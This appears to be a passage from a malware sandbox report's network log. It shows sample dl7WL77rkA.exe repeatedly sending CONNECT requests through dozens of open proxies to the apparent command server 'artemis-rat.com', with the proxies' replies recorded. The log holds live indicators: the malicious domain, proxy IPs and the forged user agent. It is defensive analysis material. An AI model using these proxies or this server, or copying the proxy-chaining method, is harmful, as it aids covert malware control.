Mar 11, 2024 03:30:40.334690094 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
696 | 192.168.2.5 | 51905 | 43.131.245.216 | 15673 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.336455107 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
697 | 192.168.2.5 | 52095 | 185.162.230.178 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.338177919 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.492515087 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
698 | 192.168.2.5 | 51882 | 91.211.177.37 | 3629 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.341433048 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
699 | 192.168.2.5 | 52106 | 185.162.231.226 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.341458082 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.498245001 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
700 | 192.168.2.5 | 51892 | 14.103.24.148 | 8000 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.344468117 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.908844948 CET | 59 | IN | HTTP/1.1 200 Connection Established
Proxy-agent: nginx


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
701 | 192.168.2.5 | 51866 | 72.49.49.113 | 1034 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.353336096 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            702192.168.2.551875103.83.232.122803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.353771925 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            703192.168.2.552124172.67.3.98803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.358581066 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.513633013 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            704192.168.2.55191069.230.240.163326503876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.359697104 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.701833010 CET | 116 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:40 GMT
Server: nginx
Content-Type: text/plain
Content-Length: 0
Mar 11, 2024 03:30:41.052822113 CET | 628 | IN | HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy54-HG100-2</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html
Data Raw:
Data Ascii:
Mar 11, 2024 03:30:41.079454899 CET | 628 | IN | HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy50-HG100-2</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html
Data Raw:
Data Ascii:


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            705192.168.2.55060888.79.243.10331283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.364243984 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.681952953 CET | 1254 | IN | HTTP/1.1 403 Forbidden
Server: squid/3.5.28
Mime-Version: 1.0
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 952
X-Squid-Error: ERR_ACCESS_DENIED 0
Content-Language: en
X-Cache: MISS from ah_test
Via: 1.1 ah_test (squid/3.5.28)
Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/*">https://artemis-rat.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Mon, 11 Mar 2024 02:30:40 GMT</p></div></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            706192.168.2.551901103.118.44.6180803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.367161036 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            707192.168.2.552004174.77.111.198495473876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.374984026 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            708192.168.2.549729138.2.73.15710803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.377542019 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            709192.168.2.552092157.185.157.151265893876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.444804907 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            710192.168.2.551447164.92.71.23232403876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.446592093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.498766899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.593036890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.702210903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            711192.168.2.552122172.93.213.177803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.447906017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.653239965 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.22.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            712192.168.2.55210438.162.11.6531283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.447906017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.861181974 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            713192.168.2.551251203.89.8.107803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.448698997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.490425110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.866493940 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.22.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            714192.168.2.55198537.221.197.165803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.449150085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.201855898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.201920986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.092787027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.702094078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            715192.168.2.549746154.65.39.8803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.449151993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.898794889 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:31 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                            Content-Length: 613
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.898833036 CET269IN
                                                                                                                                                                                                                                                            Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.38 (Debian) Server at artemis-rat.com Port 443


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            716192.168.2.552152172.64.152.98803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.450603008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.606792927 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            717192.168.2.552137156.232.9.19480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.462440968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.631088972 CET325INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.13.7
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.13.7</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            718192.168.2.552002140.82.35.234444443876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.462440968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.840213060 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            719192.168.2.54982350.63.12.33224503876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.470930099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.490483046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.514638901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.641419888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            720192.168.2.551274194.124.36.2880803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.472105980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.405374050 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
